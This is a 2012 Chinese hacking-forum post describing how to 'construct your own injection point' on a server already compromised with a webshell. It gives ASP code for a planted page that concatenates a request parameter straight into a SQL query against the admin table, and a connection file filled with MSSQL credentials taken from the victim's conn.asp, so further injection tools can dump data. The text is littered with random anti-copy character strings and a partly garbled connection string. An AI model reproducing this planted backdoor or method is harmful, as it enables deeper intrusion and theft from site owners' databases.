找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1866|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
4 ~; r7 ], `$ k) L2 w3 P7 H) b
3 f! }" K0 e9 d( W& Q今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
* `7 |5 N1 L( S# ]' j
( S# t% y2 e+ W! y" D3 R4 \这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
- r, v( j( s0 x* H1 ~3 ?2 C- J  a+ W0 Y) ]
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
6 p7 z8 j4 w& ^: Z1 z2 e3 f. M  L" s+ s" ^
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表7 h; y$ a6 z6 R  X
; M% Y/ I! S' `. c/ c
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
% C; j& m5 l. u5 H; Z) f# w1 ?4 O' i
程序代码, Z/ N3 j4 H) [: Z
<!--#include file="xx.asp"-->- f7 k/ y1 N2 Q* ?, {
<%4 K6 r7 r& z- A1 u0 w/ y
set rs=server.createobject("ADODB.recordset")
( ?+ v: E7 {1 ?id = request("id")- W: l$ ]" t; Q7 q0 b1 X+ b5 A2 J" Q
strSQL = "select * from admin where id=" & id! P1 e, x$ U" h. c3 |' F
rs.open strSQL,conn,1,3
3 o3 k& E! b6 hrs.close
5 K- q% {- C" Q( c6 U%>
; V( H3 V( b) h' a2 V1 A9 W) a) z0 J; s1 n
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
0 d9 g5 e: Q1 t( U6 |* J% X/ ^1 n; V
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!9 G% x' a3 G- \  E+ l
7 \$ O2 y. u+ f& l. ~5 ?
然后就要构造一个连接数据库的文件了,代码如下:, L* M2 e/ H6 j
程序代码
+ j) G7 x8 Y6 [; h<%        5 _0 `  e4 _# _' r0 [# n6 |6 X4 W
strSQLServerName = "000.000.000.000"     '服务器名称或地址
0 l* o+ A8 g2 w9 {1 K6 A, jstrSQLDBUserName = "sqlname"         '数据库帐号' E4 V% k: v1 f6 ]
strSQLDBPassword = "sqlpass"         '数据库密码2 l$ s7 Z' Y# ~: o) m, t6 ~
strSQLDBName = "sqldataname"           '数据库名称6 T2 d; J& U$ V* D( r, ]  C4 E/ `
Set conn = Server.CreateObject("ADODB.Connection")1 p* _) C3 M- O0 F/ d+ _
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";": H2 r9 O/ K8 O' s
conn.open strCon& |0 T2 r/ V* ~1 e9 g9 ^$ F3 d
%>  D% r* ]/ K! G) W9 x$ Q1 I9 Q

" b5 }/ W* T- s4 C3 e这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
, F5 A# C' G9 c$ v0 e! e# ]# O& x  Z8 m& o7 O
就这样,正常情况下,就OK了,伪造成功……0 P8 r% U9 d6 I

. A/ [; x8 i4 L3 P) U; V/ ?2 q; o           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表